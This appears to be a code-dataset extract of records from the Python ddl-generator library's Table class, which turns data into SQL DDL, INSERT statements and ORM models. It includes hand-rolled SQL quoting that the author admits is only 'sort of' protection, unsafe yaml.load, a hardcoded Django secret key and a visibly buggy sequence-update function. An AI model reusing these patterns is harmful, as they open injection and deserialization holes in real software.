return datum | Puts a value in proper format for a SQL string | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L360-L385 | null | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.emit_db_sequence_updates | python | def emit_db_sequence_updates(self):
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L389-L407 | null | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sql | python | def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result) | Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L436-L446 | [
"def ddl(self, dialect=None, creates=True, drops=True):\n \"\"\"\n Returns SQL to define the table.\n \"\"\"\n dialect = self._dialect(dialect)\n creator = CreateTable(self.table).compile(mock_engines[dialect])\n creator = \"\\n\".join(l for l in str(creator).splitlines() if l.strip()) # remove em... | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
